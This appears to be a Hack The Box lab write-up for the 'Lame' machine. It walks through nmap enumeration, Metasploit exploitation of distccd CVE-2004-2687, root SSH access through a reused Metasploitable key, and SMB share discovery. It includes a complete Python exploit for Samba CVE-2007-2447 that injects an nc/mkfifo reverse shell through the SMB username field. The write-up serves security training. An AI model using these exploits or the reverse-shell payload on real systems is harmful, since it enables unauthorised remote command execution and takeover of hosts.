10.10.10.3 - Lame - DistCC, SMB, SSH Reuse
Metasploitable like VM - back to old school
Summary: vulnerable software : DistCCD; POC, Netbios-ssn; POC system vulnerable : 10.10.10.3 vulnerability explanation : privilege escalation: SSH keys reuse, SMB Service running as root. severity : critical
Enumeration:
1
[+] Running only TCP port scan
2
3
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-02-02 13:04 GMT
4
Nmap scan report for 10.10.10.3
5
Host is up (0.31s latency).
6
7
PORT STATE SERVICE VERSION
8
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
9
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
10
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
11
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
12
Device type: terminal|WAP|switch|specialized|general purpose|broadband router
13
Running (JUST GUESSING): Linux 2.4.X|2.6.X (92%), Chip PC embedded (92%), SNR embedded (90%), Crestron 2-Series (90%), Asus embedded (89%)
14
OS CPE: cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:snr:snr-s2960 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:asus:rt-ac66u cpe:/o:linux:linux_kernel:2.6
15
Aggressive OS guesses: Chip PC XtremePC thin client (92%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (90%), OpenWrt White Russian 0.9 (Linux 2.4.30) (90%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (90%), SNR SNR-S2960 switch (90%), Crestron XPanel control system (90%), Linux 2.4.18 (90%), Asus RT-AC66U router (Linux 2.6) (89%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (89%), Asus RT-N16 WAP (Linux 2.6) (89%)
16
No exact OS matches for host (test conditions non-ideal).
17
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
18
19
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
20
Nmap done: 1 IP address (1 host up) scanned in 24.68 seconds
Copied!
Nmap has a script that can confirm the vulnerability in distccd:
1
└──╼ $nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse --script-args="distcc-exec.cmd='id'" -Pn
2
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-02-02 13:23 GMT
3
Nmap scan report for 10.10.10.3
4
Host is up (0.19s latency).
5
6
PORT STATE SERVICE
7
3632/tcp open distccd
8
| distcc-cve2004-2687:
9
| VULNERABLE:
10
| distcc Daemon Command Execution
11
| State: VULNERABLE (Exploitable)
12
| IDs: CVE:CVE-2004-2687
13
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
14
| Allows executing of arbitrary commands on systems running distccd 3.1 and
15
| earlier. The vulnerability is the consequence of weak service configuration.
16
|
17
| Disclosure date: 2002-02-01
18
| Extra information:
19
|
20
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
21
|
22
| References:
23
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
24
| http://distcc.googlecode.com/svn/trunk/doc/web/security.html
25
| http://http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2687
26
|_ http://http://www.osvdb.org/13378
27
28
Nmap done: 1 IP address (1 host up) scanned in 1.14 seconds
29
Copied!
Distccd exploitation:
1
msf5 exploit(unix/misc/distcc_exec) > search distcc
2
3
Matching Modules
4
================
5
6
Name Disclosure Date Rank Check Description
7
---- --------------- ---- ----- -----------
8
exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
9
10
11
msf5 exploit(unix/misc/distcc_exec) > options
12
13
Module options (exploit/unix/misc/distcc_exec):
14
15
Name Current Setting Required Description
16
---- --------------- -------- -----------
17
RHOSTS 10.10.10.3 yes The target address range or CIDR identifier
18
RPORT 3632 yes The target port (TCP)
19
20
21
Payload options (cmd/unix/reverse):
22
23
Name Current Setting Required Description
24
---- --------------- -------- -----------
25
LHOST 10.10.14.20 yes The listen address (an interface may be specified)
26
LPORT 4443 yes The listen port
27
28
29
Exploit target:
30
31
Id Name
32
-- ----
33
0 Automatic Target
34
Copied!
Result:
Whilst browsing the root folder I found .ssh folder containing authorized_keys file with a familiar login name msfadmin:
1
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== [email protected]
Copied!
It made me think that this box was built upon popular pentesting VM - Metasploitable. I started this VM to compare the details and I have confirmed that kernel version is the same as well:
All I needed to do now, was to use metasploitable id_rsa keys to login as root without a password to Lame with a command:
1
ssh [email protected] -i id_rsa
Copied!
Share discovery on port 139:
1
└──╼ $smbmap -u "" -p "" -H 10.10.10.3
2
[+] Finding open SMB ports....
3
[+] User SMB session establishd on 10.10.10.3...
4
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
5
Disk Permissions
6
---- -----------
7
print$ NO ACCESS
8
tmp READ, WRITE
9
opt NO ACCESS
10
IPC$ NO ACCESS
11
ADMIN$ NO ACCESS
12
13
└──╼ $enum4linux 10.10.10.3
14
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Feb 2 13:08:53 2019
15
16
=======================================
17
| Share Enumeration on 10.10.10.3 |
18
=======================================
19
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
20
Unable to initialize messaging context
21
22
Sharename Type Comment
23
--------- ---- -------
24
print$ Disk Printer Drivers
25
tmp Disk oh noes!
26
opt Disk
27
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
28
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
29
Reconnecting with SMB1 for workgroup listing.
30
31
Server Comment
32
--------- -------
33
34
Workgroup Master
35
--------- -------
36
WORKGROUP LAME
37
Copied!
Searchsploit Samba 3.0.20
Python version of Samba 3.0.20 < 3.0.25rc3 - 'Username' map script'
1
#!/usr/bin/python
2
# -*- coding: utf-8 -*-
3
4
# From : https://github.com/amriunix/cve-2007-2447
5
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
6
7
import sys
8
from smb.SMBConnection import SMBConnection
9
10
def exploit(rhost, rport, lhost, lport):
11
payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
12
username = "/=`nohup " + payload + "`"
13
conn = SMBConnection(username, "", "", "")
14
try:
15
conn.connect(rhost, int(rport), timeout=1)
16
except:
17
print '[+] Payload was sent - check netcat !'
18
19
if __name__ == '__main__':
20
print('[*] CVE-2007-2447 - Samba usermap script')
21
if len(sys.argv) != 5:
22
print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
23
else:
24
print("[+] Connecting !")
25
rhost = sys.argv[1]
26
rport = sys.argv[2]
27
lhost = sys.argv[3]
28
lport = sys.argv[4]
29
exploit(rhost, rport, lhost, lport)
30
Copied!
Exploit:
Result:
Copy link